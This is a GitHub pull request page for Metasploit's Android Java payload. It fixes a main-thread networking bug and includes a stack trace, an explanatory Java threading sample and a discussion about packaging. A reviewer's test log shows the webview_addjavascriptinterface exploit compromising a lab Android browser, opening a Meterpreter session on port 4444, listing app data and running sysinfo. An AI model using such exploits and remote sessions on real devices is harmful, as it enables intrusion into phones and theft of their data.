rapid7 / metasploit-javapayload

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD

Fix AndroidMeterpreter when running on Main thread #28

Closed timwr closed 9 years ago

timwr commented 9 years ago

This should fix https://github.com/rapid7/metasploit-framework/issues/4920

From adb logcat:

W/System.err( 1423): android.os.NetworkOnMainThreadException
W/System.err( 1423):    at android.os.StrictMode$AndroidBlockGuardPolicy.onNetwork(StrictMode.java:1117)
W/System.err( 1423):    at libcore.io.BlockGuardOs.recvfrom(BlockGuardOs.java:163)
W/System.err( 1423):    at libcore.io.IoBridge.recvfrom(IoBridge.java:513)
W/System.err( 1423):    at java.net.PlainSocketImpl.read(PlainSocketImpl.java:488)
W/System.err( 1423):    at java.net.PlainSocketImpl.access$000(PlainSocketImpl.java:46)
W/System.err( 1423):    at java.net.PlainSocketImpl$PlainSocketInputStream.read(PlainSocketImpl.java:240)
W/System.err( 1423):    at libcore.io.Streams.readFully(Streams.java:81)
W/System.err( 1423):    at java.io.DataInputStream.readInt(DataInputStream.java:124)
W/System.err( 1423):    at com.metasploit.meterpreter.Meterpreter.startExecuting(Unknown Source)
W/System.err( 1423):    at com.metasploit.meterpreter.AndroidMeterpreter$1.run(AndroidMeterpreter.java:67)
W/System.err( 1423):    at android.os.Handler.handleCallback(Handler.java:615)
W/System.err( 1423):    at android.os.Handler.dispatchMessage(Handler.java:92)
W/System.err( 1423):    at android.os.Looper.loop(Looper.java:137)
W/System.err( 1423):    at android.app.ActivityThread.main(ActivityThread.java:4745)
W/System.err( 1423):    at java.lang.reflect.Method.invokeNative(Native Method)
W/System.err( 1423):    at java.lang.reflect.Method.invoke(Method.java:511)
W/System.err( 1423):    at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:786)
W/System.err( 1423):    at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:553)
W/System.err( 1423):    at dalvik.system.NativeStart.main(Native Method)

In some cases the thread that's loading meterpreter can't retrieve the Context object. To work around this we post to the Main/UI thread and try to find the Context again. After https://github.com/rapid7/metasploit-javapayload/pull/23 I forgot to switch the execution back to a background thread.
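The threading pattern described in this comment, as an added illustration that is not code from metasploit-javapayload: the first method reproduces the bug shown in the logcat trace (blocking socket work posted straight onto the main Looper, which StrictMode rejects with NetworkOnMainThreadException), the second keeps the main-thread detour only for the Context lookup and hands the blocking work to a background thread. `ContextLocator`, `Session` and the method names are hypothetical names chosen for this example.

```java
import android.content.Context;
import android.os.Handler;
import android.os.Looper;

// Added illustration of the PR's bug and fix; not code from metasploit-javapayload.
// ContextLocator, Session and all method names are hypothetical.
public class MainThreadHandoff {
    /** Caller-supplied Context lookup; may return null off the main thread. */
    public interface ContextLocator { Context locate(); }
    /** The blocking work (socket reads etc.) that must stay off the main thread. */
    public interface Session { void run(Context ctx) throws Exception; }

    // Bug pattern matching the logcat trace above: the Runnable posted to the
    // main Looper does the blocking read itself, so StrictMode throws
    // NetworkOnMainThreadException from inside Handler.handleCallback().
    public static void startBroken(final ContextLocator locator, final Session session) {
        new Handler(Looper.getMainLooper()).post(new Runnable() {
            public void run() {
                try { session.run(locator.locate()); }
                catch (Exception e) { e.printStackTrace(); }
            }
        });
    }

    // Fix: the main thread is used only to recover the Context; the blocking
    // work is then handed to a background thread so the Looper is never blocked.
    public static void startFixed(final ContextLocator locator, final Session session) {
        Context ctx = locator.locate();
        if (ctx != null) {               // found directly: no detour via the UI thread
            runInBackground(ctx, session);
            return;
        }
        new Handler(Looper.getMainLooper()).post(new Runnable() {
            public void run() {
                Context found = locator.locate();   // second attempt, now on the UI thread
                runInBackground(found, session);    // return to the Looper immediately
            }
        });
    }

    private static void runInBackground(final Context ctx, final Session session) {
        Thread worker = new Thread(new Runnable() {
            public void run() {
                try { session.run(ctx); }
                catch (Exception e) { e.printStackTrace(); }
            }
        });
        worker.start();
    }
}
```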

bcook-r7 commented 9 years ago

Thanks @timwr.

timwr commented 9 years ago

It would be cool to have the binaries for this project out of source control in the main repository; it sucks to add weight for minor changes like this. I'm not sure how well git compresses them. Minor, but I also need to make it so (android) binaries don't change each time you rebuild them. I remember @schierlm telling me it's likely only the build time-stamp that changes each time.

OJ commented 9 years ago

Binaries will end up in the gem like the others at some point.

bcook-r7 commented 9 years ago

So, one question that came up while I was testing up a bigger-scope meterpreter gem earlier. meterpreter_bins's methods mostly assume the files you want come from a 'meterpreter' directory, whereas javapayload includes stagers as well. So, it made sense to call the bigger gem something like 'metasploit-payloads' and modify the file search methods to be more general. Does that sound like a good approach?

timwr commented 9 years ago

Sounds good to me, thanks @bcook-r7 :)

bcook-r7 commented 9 years ago

Looks good to me. Sorry for the delay:

msf exploit(webview_addjavascriptinterface) > [-] 192.168.56.1     webview_addjavascriptinterface - Target has requested an unknown path: /x/LCsBfh/
[*] 192.168.56.1     webview_addjavascriptinterface - Gathering target information.
[*] 192.168.56.1     webview_addjavascriptinterface - Sending HTML response.
[*] 192.168.56.1     webview_addjavascriptinterface - Serving armle exploit...
[*] Sending stage (44790 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:52887) at 2015-03-22 21:44:59 -0500

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: /data/data/com.android.browser
=======================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  10128  fil   2015-03-22 21:38:33 -0500  WYTfP.dex
40666/rw-rw-rw-   2048   dir   2015-03-22 21:38:07 -0500  app_appcache
40666/rw-rw-rw-   2048   dir   2015-03-22 21:38:07 -0500  app_databases
40666/rw-rw-rw-   2048   dir   2015-03-22 21:38:18 -0500  app_geolocation
40666/rw-rw-rw-   2048   dir   2015-03-22 21:45:03 -0500  app_icons
40666/rw-rw-rw-   2048   dir   2015-03-22 21:44:59 -0500  cache
40666/rw-rw-rw-   2048   dir   2015-03-22 21:44:57 -0500  databases
40444/r--r--r--   2048   dir   2015-03-22 21:37:06 -0500  lib
100666/rw-rw-rw-  10128  fil   2015-03-22 21:44:58 -0500  neKqu.dex
40666/rw-rw-rw-   2048   dir   2015-03-22 21:38:06 -0500  shared_prefs

meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.1.2 - Linux 2.6.29-gc497e41 (armv7l)
Meterpreter : java/android